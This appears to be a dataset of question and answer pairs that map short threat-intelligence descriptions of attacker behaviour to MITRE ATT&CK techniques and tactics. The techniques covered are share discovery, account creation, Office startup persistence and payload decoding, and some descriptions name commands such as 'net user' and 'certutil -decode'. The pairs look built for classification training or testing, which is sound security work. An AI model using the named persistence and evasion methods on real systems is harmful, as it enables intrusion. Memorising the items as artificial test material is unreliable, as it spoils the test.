+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has enumerated network shares on a compromised host.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used the post exploitation tool CrackMapExec to enumerate network shares.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used the net share command as part of network reconnaissance.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used net share and net view to identify network shares of interest.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkVishnya scanned the network for public shared folders.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems.","Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has executed net view commands for enumeration of open shares on compromised machines.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sowbug listed remote shared drives that were accessible from a victim.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team has used tools such as NBTscan to enumerate network shares.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper used netview to scan target systems for shared resources.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used the “net view” command to locate mapped network shares.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira can identify remote file shares for encryption.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon has enumerated shared folders and mapped volumes.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker has enumerated shared drives on a compromised network.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can check a user's access to the C$ share on a compromised machine.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Babuk has the ability to enumerate network shares.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit enumerates open SMB shares on internal victim networks.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can enumerate shared drives on the domain.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer can search for network shares on the domain or workgroup using net view .,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat has the ability to discover network shares on compromised networks.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling has the ability to enumerate network shares.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop can enumerate network shares.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can query shared drives on the local system.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti can enumerate remote open SMB network shares using NetShareEnum().,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can enumerate the shared folders and associated permissions for a targeted network.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba can discover shared resources using the NetShareEnum API call.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEATHRANSOM has the ability to use loop operations to enumerate network resources.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol has a `ENMDSKS` command to enumerates available network shares.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has enumerated non-hidden network shares using `WNetEnumResourceW`.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can find shared drives on the local system.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIVEHANDS can enumerate network shares and mounted drives on a network.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro has been used to execute `net view` to discover mapped network shares.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HELLOKITTY has the ability to enumerate network resources.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can gather network share information.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOPILUWAK can use netstat and Net to discover network shares.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can scan local network for open SMB.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs collects a list of network shares with the command net share.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MURKYTOP has the capability to retrieve information about shares on remote hosts.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The net view \\remotesystem and net share commands in Net can be used to find shared drives and directories on remote and local systems respectively.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSInfo discovers shares on the network,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Olympic Destroyer will attempt to enumerate mapped network shares to later attempt to wipe all files on those shares.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX has a module to enumerate network shares.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can list local and remote shared drives and folders over SMB.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use net share to identify network shares for use in lateral movement.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuietSieve can identify and search networked drives for specific file name extensions.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can scan for network drives which may contain documents for collection.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Royal can enumerate the shared resources of a given IP addresses using the API call `NetShareEnum`.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can enumerate shares on a compromised host.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to execute the `net view` command.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat can enumerate connected drives for infected host machines.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet enumerates the directories of a network resource.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot module shareDll/mshareDll discovers network shares via the WNetOpenEnumA API.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker can identify network adjacent and accessible drives.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can enumerate connected remote logical drives.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy identifies network drives when they are added to victim systems.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team added a login to a SQL Server with `sp_addlinkedsrvlogin`.","Tecnique: T1136 Create Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider used wmic.exe to add a new user to the system.,"Tecnique: T1136 Create Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider creates new user identities within the compromised organization.,"Tecnique: T1136 Create Account, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has been known to create or enable accounts, such as support_388945a0.","Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has created accounts on multiple compromised hosts to perform actions within the network.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has created user accounts.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has created Local Administrator accounts to maintain access to systems with short-cycle credential rotation.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has created accounts on victims, including administrator accounts, some of which appeared to be tailored to each individual staging target.","Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has created MS-SQL local accounts in a compromised network.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has created a local user account with administrator privileges.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has created accounts with net user.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer used a tool called Imecab to set up a persistent remote access account on the victim machine.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has created local accounts named `help` and `DefaultAccount` on compromised machines.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has created local privileged users on victim machines.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has created local administrator accounts to maintain persistence in compromised networks.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto has the capability to add its own account to the victim's machine.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak can create a Windows account.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate creates a local user account, SafeMode, via net user commands.","Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire has a module for creating a local user if permissions allow.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flame can create backdoor accounts with login “HelpAssistant” on domain connected systems if appropriate rights are available.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy can create new users on an infected system.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HiddenWasp creates a user account as a means to provide initial persistence to the compromised machine.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has created a user named “monerodaemon”.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type may create a temporary user on the system named `Lost_{Unique Identifier}`.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The net user username \password commands in Net can be used to create a local account.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can user PowerView to execute “net user” commands and create local system accounts.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type may create a temporary user on the system named `Lost_{Unique Identifier}` with the password `pond~!@6”{Unique Identifier}`.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has created user accounts.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ServHelper has created a new user named ""supportaccount"".","Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell has a feature to create local user accounts.,"Tecnique: T1136.001 Create Account: Local Account, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team created privileged domain accounts to be used for further exploitation and lateral movement.","Tecnique: T1136.002 Create Account: Domain Account, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team created two new accounts, “admin” and “система” (System). The accounts were then assigned to a domain matching local operation and were delegated new privileges.","Tecnique: T1136.002 Create Account: Domain Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM created high-privileged domain user accounts to maintain access to victim networks.,"Tecnique: T1136.002 Create Account: Domain Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has created domain accounts.,"Tecnique: T1136.002 Create Account: Domain Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has created and used new accounts within a victim's Active Directory environment to maintain persistence.,"Tecnique: T1136.002 Create Account: Domain Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire has a module for creating a new domain user if permissions allow.,"Tecnique: T1136.002 Create Account: Domain Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The net user username \password \domain commands in Net can be used to create a domain account.,"Tecnique: T1136.002 Create Account: Domain Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PsExec has the ability to remotely create accounts on target systems.,"Tecnique: T1136.002 Create Account: Domain Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can user PowerView to execute “net user” commands and create domain accounts.,"Tecnique: T1136.002 Create Account: Domain Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 can create new users through Azure AD.,"Tecnique: T1136.003 Create Account: Cloud Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has created global admin accounts in the targeted organization's cloud instances to gain persistence.,"Tecnique: T1136.003 Create Account: Cloud Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can create new Azure AD users.,"Tecnique: T1136.003 Create Account: Cloud Account, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.,"Tecnique: T1137 Office Application Startup, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has inserted malicious macros into existing documents, providing persistence when they are reopened. Gamaredon Group has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the /altvba option, once the Application.Startup event is received.","Tecnique: T1137 Office Application Startup, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used a Word Template, Normal.dotm, for persistence.","Tecnique: T1137.001 Office Application Startup: Office Template Macros, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.,"Tecnique: T1137.001 Office Application Startup: Office Template Macros, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike has the ability to use an Excel Workbook to execute additional code by enabling Office to trust macros and execute code without user permission.,"Tecnique: T1137.001 Office Application Startup: Office Template Macros, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key HKCU\Software\Microsoft\Office test\Special\Perf to execute code.,"Tecnique: T1137.002 Office Application Startup: Office Test, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ruler can be used to automate the abuse of Outlook Forms to establish persistence.,"Tecnique: T1137.003 Office Application Startup: Outlook Forms, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has abused the Outlook Home Page feature for persistence. OilRig has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse.,"Tecnique: T1137.004 Office Application Startup: Outlook Home Page, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ruler can be used to automate the abuse of Outlook Home Pages to establish persistence.,"Tecnique: T1137.004 Office Application Startup: Outlook Home Page, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ruler can be used to automate the abuse of Outlook Rules to establish persistence.,"Tecnique: T1137.005 Office Application Startup: Outlook Rules, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naikon has used the RoyalRoad exploit builder to drop a second stage loader, intel.wll, into the Word Startup folder on the compromised host.","Tecnique: T1137.006 Office Application Startup: Add-ins, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has been loaded through a `.wll` extension added to the ` %APPDATA%\microsoft\word\startup\` repository.,"Tecnique: T1137.006 Office Application Startup: Add-ins, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0021, the threat actors deobfuscated encoded PowerShell commands including use of the specific string `'FromBase'+0x40+'String'`, in place of `FromBase64String` which is normally used to decode base64.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors deobfuscated Base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dust Storm, attackers used VBS code to decode payloads.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, malicious files were decoded prior to execution.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Spalax, the threat actors used a variety of packers and droppers to decrypt malicious payloads.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used 7-Zip to decode their Raindrop malware.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT19 HTTP malware variant decrypts strings using single-byte XOR keys.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used malware to decrypt encrypted CAB files.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER downloads encoded payloads and decodes them on the victim.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has used weaponized DLLs to load and decrypt payloads.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has decrypted strings and imports using RC4 during execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has used certutil to decode a string into a cabinet file.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has utilized `certutil` to decode base64 encoded versions of custom malware.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group tools decrypted additional payloads from the C2. Gamaredon Group has also decoded base64-encoded source code of a downloader.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group malware can decode contents from a payload that was Base64 encoded and write the contents to a file.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa used certutil to decode Base64 binaries at runtime and a 16-byte XOR key to decrypt data.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has deobfuscated Base64-encoded shellcode strings prior to loading them.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has decoded malicious VBScripts using Base64.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used shellcode within macros to decrypt and manually map DLLs and shellcode into memory at runtime.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malteiro has the ability to deobfuscate downloaded files prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats decompresses ZIP files once on the victim machine.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has decoded base64-encoded PowerShell, JavaScript, and VBScript.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A OilRig macro has run a PowerShell command to decode file contents. OilRig has also used certutil to decode base64-encoded files on victims.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has extracted tar.gz files after downloading them from a C2 server.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team's VBS backdoor can decode Base64-encoded data and save it to the %TEMP% folder. The group also decrypted received information using the Triple DES algorithm and decompresses it using GZip.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has decrypted packed DLLs with an XOR key.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has used a script that decodes a Base64-encoded version of WeaveWorks Scope.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During execution, Threat Group-3390 malware deobfuscates and decompresses code that was encoded with Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper used shellcode with an XOR algorithm to decrypt a payload. Tropic Trooper also decrypted image files which contained a payload.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used a custom decryption routine, which pulls key and salt values from other artifacts such as a WMI filter or PowerShell Profile, to decode encrypted PowerShell payloads.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIRTE has used Base64 to decode malicious VBS script.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used the AES256 algorithm with a SHA1 derived key to decrypt exploit code.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used certutil in a macro to decode base64-encoded content contained in a dropper document attached to an email. The group has also used certutil -decode to decode files on the victim’s machine when dropping UPPERCUT.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
